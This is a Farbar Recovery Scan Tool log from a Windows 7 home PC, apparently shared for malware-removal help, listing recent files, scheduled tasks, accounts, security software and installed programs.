2017-11-26 08:20 - 2017-11-26 08:20 - 000000000 ____D C:\Users\sheri\AppData\Local\ServiceHub
2017-11-26 08:18 - 2017-11-26 08:18 - 001077184 _____ (Microsoft Corporation) C:\Users\sheri\Downloads\vs_Community.exe
2017-11-26 08:09 - 2010-06-02 04:55 - 000527192 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2017-11-26 08:09 - 2010-06-02 04:55 - 000239960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2017-11-26 08:09 - 2010-06-02 04:55 - 000074072 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 002106216 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 001998168 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 001868128 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 000470880 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2017-11-26 08:09 - 2010-05-26 11:41 - 000248672 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2017-11-26 08:09 - 2010-02-04 10:01 - 000528216 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2017-11-26 08:09 - 2010-02-04 10:01 - 000238936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2017-11-26 08:09 - 2010-02-04 10:01 - 000074072 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2017-11-26 08:09 - 2010-02-04 10:01 - 000022360 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2017-11-26 08:09 - 2009-09-04 17:44 - 000515416 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2017-11-26 08:09 - 2009-09-04 17:44 - 000238936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2017-11-26 08:09 - 2009-09-04 17:44 - 000069464 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 005501792 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 001974616 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 001892184 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 000453456 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2017-11-26 08:09 - 2009-09-04 17:29 - 000235344 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2017-11-26 08:09 - 2009-03-16 14:18 - 000517448 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2017-11-26 08:09 - 2009-03-16 14:18 - 000235352 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2017-11-26 08:09 - 2009-03-16 14:18 - 000022360 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2017-11-26 08:09 - 2009-03-09 15:27 - 004178264 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2017-11-26 08:09 - 2009-03-09 15:27 - 001846632 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2017-11-26 08:09 - 2009-03-09 15:27 - 000453456 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2017-11-26 08:09 - 2008-10-27 10:04 - 000514384 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2017-11-26 08:09 - 2008-10-27 10:04 - 000235856 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2017-11-26 08:09 - 2008-10-27 10:04 - 000070992 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2017-11-26 08:09 - 2008-10-27 10:04 - 000023376 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2017-11-26 08:09 - 2008-10-10 04:52 - 004379984 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2017-11-26 08:09 - 2008-10-10 04:52 - 002036576 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2017-11-26 08:09 - 2008-10-10 04:52 - 000452440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2017-11-26 08:09 - 2008-07-31 10:41 - 000238088 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2017-11-26 08:09 - 2008-07-31 10:41 - 000068616 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2017-11-26 08:09 - 2008-07-31 10:40 - 000509448 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2017-11-26 08:09 - 2008-07-10 11:01 - 000467984 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2017-11-26 08:09 - 2008-07-10 11:00 - 003851784 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2017-11-26 08:09 - 2008-07-10 11:00 - 001493528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2017-11-26 08:09 - 2008-05-30 14:19 - 000507400 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2017-11-26 08:09 - 2008-05-30 14:18 - 000238088 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2017-11-26 08:09 - 2008-05-30 14:17 - 000065032 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2017-11-26 08:09 - 2008-05-30 14:17 - 000025608 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2017-11-26 08:09 - 2008-05-30 14:11 - 003850760 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2017-11-26 08:09 - 2008-05-30 14:11 - 001491992 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2017-11-26 08:09 - 2008-05-30 14:11 - 000467984 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
2017-11-26 08:09 - 2008-03-05 16:03 - 000479752 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2017-11-26 08:09 - 2008-03-05 16:03 - 000238088 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2017-11-26 08:09 - 2008-03-05 16:00 - 000025608 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2017-11-26 08:09 - 2008-03-05 15:56 - 003786760 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
2017-11-26 08:09 - 2008-03-05 15:56 - 001420824 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2017-11-26 08:09 - 2008-02-05 23:07 - 000462864 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2017-11-26 08:09 - 2007-10-22 03:39 - 000267272 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2017-11-26 08:09 - 2007-10-22 03:37 - 000017928 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2017-11-26 08:09 - 2007-10-12 15:14 - 003734536 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2017-11-26 08:09 - 2007-10-12 15:14 - 001374232 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2017-11-26 08:09 - 2007-10-02 09:56 - 000444776 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2017-11-26 08:09 - 2007-07-20 00:57 - 000267112 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2017-11-26 08:09 - 2007-07-19 18:14 - 003727720 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2017-11-26 08:09 - 2007-07-19 18:14 - 001358192 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2017-11-26 08:09 - 2007-07-19 18:14 - 000444776 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2017-11-26 08:09 - 2007-06-20 20:46 - 000266088 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2017-11-26 08:09 - 2007-05-16 16:45 - 003497832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2017-11-26 08:09 - 2007-05-16 16:45 - 001124720 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2017-11-26 08:09 - 2007-05-16 16:45 - 000443752 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2017-11-26 08:09 - 2007-04-04 18:55 - 000261480 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2017-11-26 08:09 - 2007-04-04 18:53 - 000081768 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2017-11-26 08:09 - 2007-03-15 16:57 - 000443752 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2017-11-26 08:09 - 2007-03-12 16:42 - 003495784 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2017-11-26 08:09 - 2007-03-12 16:42 - 001123696 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2017-11-26 08:09 - 2007-03-05 12:42 - 000015128 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2017-11-26 08:09 - 2007-01-24 15:27 - 000255848 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2017-11-26 08:09 - 2006-12-08 12:02 - 000251672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2017-11-26 08:09 - 2006-11-29 13:06 - 003426072 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2017-11-26 08:09 - 2006-11-29 13:06 - 000440080 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2017-11-26 08:09 - 2006-09-28 16:05 - 002414360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2017-11-26 08:09 - 2006-09-28 16:05 - 000237848 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2017-11-26 08:09 - 2006-07-28 09:30 - 000236824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2017-11-26 08:09 - 2006-07-28 09:30 - 000062744 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2017-11-26 08:09 - 2006-05-31 07:24 - 000230168 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2017-11-26 08:09 - 2006-03-31 12:40 - 002388176 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2017-11-26 08:09 - 2006-03-31 12:39 - 000229584 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2017-11-26 08:09 - 2006-03-31 12:39 - 000062672 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2017-11-26 08:09 - 2006-02-03 08:43 - 002332368 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2017-11-26 08:09 - 2006-02-03 08:42 - 000230096 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2017-11-26 08:09 - 2006-02-03 08:41 - 000014032 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2017-11-26 08:09 - 2005-12-05 18:09 - 002323664 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2017-11-26 08:09 - 2005-07-22 19:59 - 002319568 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2017-11-26 08:09 - 2005-05-26 15:34 - 002297552 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2017-11-26 08:09 - 2005-03-18 17:19 - 002337488 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2017-11-26 08:09 - 2005-02-05 19:45 - 002222800 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
2017-11-26 08:08 - 2017-11-26 08:09 - 000000000 ___HD C:\Windows\msdownld.tmp
2017-11-26 08:08 - 2017-11-26 08:09 - 000000000 ____D C:\Windows\system32\directx
2017-11-26 08:06 - 2017-11-26 08:06 - 000000000 ____D C:\Program Files\Common Files\Java
2017-11-26 08:05 - 2017-11-26 08:05 - 000095808 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2017-11-26 08:05 - 2017-11-26 08:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-11-26 08:05 - 2017-11-26 08:05 - 000000000 ____D C:\Program Files\Java
2017-11-26 07:58 - 2017-11-26 07:59 - 009385872 _____ (Adobe Systems Inc.) C:\Users\sheri\Downloads\Shockwave_Installer_Full.exe
2017-11-26 07:46 - 2017-11-26 07:46 - 000298216 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvmf6232.sys
2017-11-17 11:07 - 2017-11-17 11:07 - 000052390 _____ C:\ProgramData\1510945611.bdinstall.bin
2017-11-17 11:06 - 2017-11-17 11:06 - 000022336 _____ C:\ProgramData\agent.uninstall.1510945574.bdinstall.bin
2017-11-17 08:19 - 2017-11-17 08:19 - 000070959 _____ C:\ProgramData\1510935518.bdinstall.bin
2017-11-17 08:19 - 2017-11-17 08:19 - 000000000 ____D C:\Program Files\Common Files\Bitdefender
2017-11-17 08:18 - 2017-11-17 11:07 - 000000000 ____D C:\Program Files\Bitdefender
2017-11-16 22:55 - 2017-11-17 11:07 - 000000000 ____D C:\ProgramData\Bitdefender
2017-11-16 22:54 - 2017-11-16 22:54 - 000000000 ____D C:\Users\sheri\AppData\Roaming\QuickScan
2017-11-16 22:47 - 2017-11-18 04:51 - 000000000 ____D C:\Program Files\Bitdefender Agent
2017-11-16 22:47 - 2017-11-16 22:47 - 000047148 _____ C:\ProgramData\agent.1510901256.bdinstall.bin
2017-11-15 07:11 - 2017-10-11 16:37 - 011410944 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2017-11-15 07:11 - 2017-10-11 16:37 - 001549824 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2017-11-15 07:11 - 2017-10-11 16:37 - 001363968 _____ (Microsoft Corporation) C:\Windows\system32\Query.dll
2017-11-15 07:10 - 2017-10-17 18:16 - 000114408 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-11-15 07:10 - 2017-10-17 18:11 - 000488448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-11-15 07:10 - 2017-10-17 17:55 - 000285696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000259584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2017-11-15 07:10 - 2017-10-17 17:55 - 000006016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2017-11-15 07:10 - 2017-10-16 14:49 - 001213672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-11-15 07:10 - 2017-10-16 13:55 - 000339968 _____ (Microsoft Corporation) C:\Windows\system32\msexcl40.dll
2017-11-15 07:10 - 2017-10-15 14:04 - 000313184 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-11-15 07:10 - 2017-10-11 16:40 - 000308456 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 012574208 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2017-11-15 07:10 - 2017-10-11 16:37 - 001400320 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000666624 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000337408 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000197120 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000111104 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000104448 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000059392 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2017-11-15 07:10 - 2017-10-11 16:37 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2017-11-15 07:10 - 2017-10-11 16:26 - 000427520 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2017-11-15 07:10 - 2017-10-11 16:26 - 000164352 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2017-11-15 07:10 - 2017-10-11 16:25 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2017-11-15 07:10 - 2017-10-11 16:25 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2017-11-15 07:10 - 2017-10-11 16:24 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2017-11-15 07:10 - 2017-10-11 16:24 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2017-11-15 07:10 - 2017-10-11 16:24 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2017-11-15 07:10 - 2017-10-11 16:16 - 000034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-11-15 07:10 - 2017-10-11 16:14 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\luafv.sys
2017-11-15 07:10 - 2017-10-04 05:04 - 001918464 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2017-11-15 07:10 - 2017-10-04 05:04 - 001321472 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000541696 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000509440 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000303616 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000193536 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-11-15 07:10 - 2017-10-04 05:04 - 000150016 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-11-14 13:41 - 2017-11-14 13:41 - 000165925 _____ C:\Users\sheri\Documents\Scan_0003.pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-12-13 07:32 - 2009-07-13 20:34 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-12-13 07:32 - 2009-07-13 20:34 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-12-13 07:00 - 2017-09-16 12:00 - 000000994 _____ C:\Windows\Tasks\Yahoo! Powered totes.job
2017-12-13 07:00 - 2017-09-16 12:00 - 000000000 ____D C:\ProgramData\{C7F70294-4DB5-8852-CB73-161051319DDE}
2017-12-13 06:45 - 2009-07-13 18:37 - 000000000 ____D C:\Windows\inf
2017-12-13 06:27 - 2009-07-13 20:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-12-13 05:53 - 2010-11-20 13:01 - 000781298 _____ C:\Windows\system32\PerfStringBackup.INI
2017-12-13 05:32 - 2017-03-14 18:26 - 000000000 ____D C:\Users\sheri\AppData\Local\ElevatedDiagnostics
2017-12-13 05:18 - 2017-03-14 18:49 - 000000000 ____D C:\Windows\pss
2017-12-13 05:00 - 2016-10-31 07:00 - 000000000 ____D C:\Users\sheri\AppData\Local\VirtualStore
2017-12-13 04:40 - 2017-02-04 04:07 - 000000000 ____D C:\Users\sheri\AppData\Local\Adobe
2017-12-13 04:28 - 2017-02-05 00:15 - 000000376 _____ C:\Windows\Tasks\update-sys.job
2017-12-13 04:28 - 2009-07-13 20:33 - 000489496 _____ C:\Windows\system32\FNTCACHE.DAT
2017-12-13 04:27 - 2009-07-13 18:37 - 000000000 ____D C:\Windows\system32\Setup
2017-12-13 02:31 - 2017-02-05 00:06 - 000000000 ____D C:\Windows\system32\MRT
2017-12-13 02:26 - 2017-10-11 19:21 - 130448288 ____C (Microsoft Corporation) C:\Windows\system32\MRT-KB890830.exe
2017-12-13 02:26 - 2017-02-05 00:05 - 130448288 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-12-13 01:09 - 2017-02-04 04:08 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2017-12-13 01:09 - 2017-02-04 04:08 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2017-12-13 01:09 - 2017-02-04 04:08 - 000000000 ____D C:\Windows\system32\Macromed
2017-12-12 11:38 - 2017-09-16 12:00 - 000000000 ____D C:\Users\sheri\AppData\Roaming\397997B4-6E82-BE01-C692-08C19D3204DC
2017-12-12 08:25 - 2017-02-04 04:18 - 000148688 _____ C:\Users\sheri\AppData\Local\GDIPFONTCACHEV1.DAT
2017-12-12 08:07 - 2016-10-31 07:13 - 000000000 ____D C:\Users\sheri\AppData\Local\Google
2017-12-12 07:51 - 2017-02-05 00:15 - 000000376 _____ C:\Windows\Tasks\update-S-1-5-21-3948143356-924845713-1080013463-1000.job
2017-12-12 06:06 - 2017-02-04 05:25 - 050814976 _____ C:\Windows\system32\config\SOFTWARE.iobit
2017-12-12 06:06 - 2017-02-04 05:25 - 001400832 _____ C:\Windows\system32\config\DEFAULT.iobit
2017-12-12 06:06 - 2017-02-04 05:25 - 000024576 _____ C:\Windows\system32\config\SECURITY.iobit
2017-12-12 06:06 - 2017-02-04 05:25 - 000024576 _____ C:\Windows\system32\config\SAM.iobit
2017-12-11 21:35 - 2017-02-04 04:52 - 000000000 ____D C:\Users\sheri\AppData\Roaming\IMVU
2017-12-11 16:53 - 2017-05-30 14:41 - 000000000 ____D C:\Users\sheri\AppData\Local\Roblox
2017-12-11 05:38 - 2017-09-08 05:18 - 000000000 ____D C:\Users\sheri\Desktop\IMPORTANT
2017-12-08 03:26 - 2017-02-04 04:19 - 000000000 ____D C:\ProgramData\ProductData
2017-12-05 05:26 - 2009-07-13 20:53 - 000032538 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-12-04 10:10 - 2016-10-31 07:00 - 000000000 ____D C:\Users\sheri
2017-12-04 04:05 - 2009-07-13 18:37 - 000000000 ____D C:\Windows\rescache
2017-12-02 21:09 - 2017-02-09 05:14 - 030924800 _____ C:\Windows\system32\config\COMPONENTS.iobit
2017-11-27 21:43 - 2017-02-05 20:03 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-11-27 21:43 - 2017-02-04 04:52 - 000000000 ____D C:\Users\sheri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU
2017-11-26 08:41 - 2017-02-04 04:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare
2017-11-26 08:41 - 2017-02-04 04:18 - 000000000 ____D C:\ProgramData\IObit
2017-11-26 08:22 - 2017-02-04 04:33 - 000000000 ____D C:\ProgramData\NVIDIA
2017-11-26 08:19 - 2017-04-03 08:14 - 000000000 ____D C:\Program Files\Microsoft Visual Studio
2017-11-26 08:06 - 2017-02-04 04:33 - 000000000 ____D C:\ProgramData\Oracle
2017-11-26 07:59 - 2017-02-04 04:09 - 000000000 ____D C:\Windows\system32\Adobe
2017-11-26 07:46 - 2017-02-04 04:31 - 000953856 _____ (NVIDIA Corporation) C:\Windows\system32\fdco2.dll
2017-11-26 07:46 - 2017-02-04 04:31 - 000758784 _____ (NVIDIA Corporation) C:\Windows\system32\cohelper.dll
2017-11-26 07:46 - 2017-02-04 04:31 - 000240232 _____ (NVIDIA Corporation) C:\Windows\system32\nvconrm.dll
2017-11-26 07:46 - 2017-02-04 04:31 - 000011164 _____ C:\Windows\system32\Drivers\nvphy.bin
2017-11-26 07:46 - 2017-02-04 04:30 - 000604776 _____ (NVIDIA Corporation) C:\Windows\system32\nvuninst.exe
2017-11-21 19:01 - 2017-02-04 04:52 - 000001829 _____ C:\Users\sheri\Desktop\Run IMVU.lnk
2017-11-20 12:32 - 2017-02-04 03:58 - 000450720 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-11-16 08:15 - 2017-11-06 08:57 - 000000000 ____D C:\Program Files\Panda Security
2017-11-16 08:15 - 2017-11-06 08:54 - 000000000 ____D C:\ProgramData\Panda Security
2017-11-16 08:11 - 2017-11-06 08:59 - 000000000 ____D C:\Users\sheri\AppData\Roaming\Panda Security
2017-11-16 01:14 - 2017-11-06 09:01 - 000000000 ____D C:\ProgramData\panda_url_filtering
2017-11-16 01:14 - 2017-02-04 23:04 - 000000000 ____D C:\Windows\system32\appraiser
2017-11-15 20:40 - 2016-10-31 07:14 - 000002101 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

==================== Files in the root of some directories =======

2017-11-06 09:17 - 2017-11-06 09:17 - 000000033 _____ () C:\Users\sheri\AppData\Roaming\AdobeWLCMCache.dat
2017-12-12 07:00 - 2017-12-13 07:00 - 000000052 _____ () C:\Users\sheri\AppData\Local\bpDLTbpDLT
2017-12-07 15:53 - 2017-12-07 15:53 - 000011138 _____ () C:\Users\sheri\AppData\Local\recently-used.xbel
2017-02-05 00:15 - 2017-02-05 00:15 - 000000003 _____ () C:\Users\sheri\AppData\Local\updater.log
2017-02-05 00:15 - 2017-05-08 07:38 - 000000413 _____ () C:\Users\sheri\AppData\Local\UserProducts.xml

Some files in TEMP:
====================
2017-12-13 06:00 - 2017-12-13 06:00 - 012686696 _____ (Reimage) C:\Users\sheri\AppData\Local\Temp\ReimagePackage.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-12-09 02:13

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-12-2017
Ran by sheri (13-12-2017 07:45:53)
Running from C:\Users\sheri\Desktop
Microsoft Windows 7 Home Premium Service Pack 1 (X86) (2016-10-31 15:00:17)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3948143356-924845713-1080013463-500 - Administrator - Disabled)
Guest (S-1-5-21-3948143356-924845713-1080013463-501 - Limited - Disabled)
sheri (S-1-5-21-3948143356-924845713-1080013463-1000 - Administrator - Enabled) => C:\Users\sheri

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Creative Cloud (HKLM\...\Adobe Creative Cloud) (Version: 4.3.0.256 - Adobe Systems Incorporated)
Adobe Flash Player 28 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 28.0.0.126 - Adobe Systems Incorporated)
Adobe Flash Player 28 PPAPI (HKLM\...\Adobe Flash Player PPAPI) (Version: 28.0.0.126 - Adobe Systems Incorporated)
Adobe Illustrator CC 2018 (32 Bit) (HKLM\...\ILST_22_0_1_32) (Version: 22.0.1 - Adobe Systems Incorporated)
Adobe Photoshop CS6 version 13.0.1 (HKLM\...\{A724DC44-6241-42D3-BA57-778B178ABC17}_is1) (Version: 13.0.1 - Adobe Systems, Inc.)
Adobe Shockwave Player 11.5 (HKLM\...\Adobe Shockwave Player) (Version: 11.5.8.612 - Adobe Systems, Inc.)
Advanced SystemCare 11 (HKLM\...\Advanced SystemCare_is1) (Version: 11.0.3 - IObit)
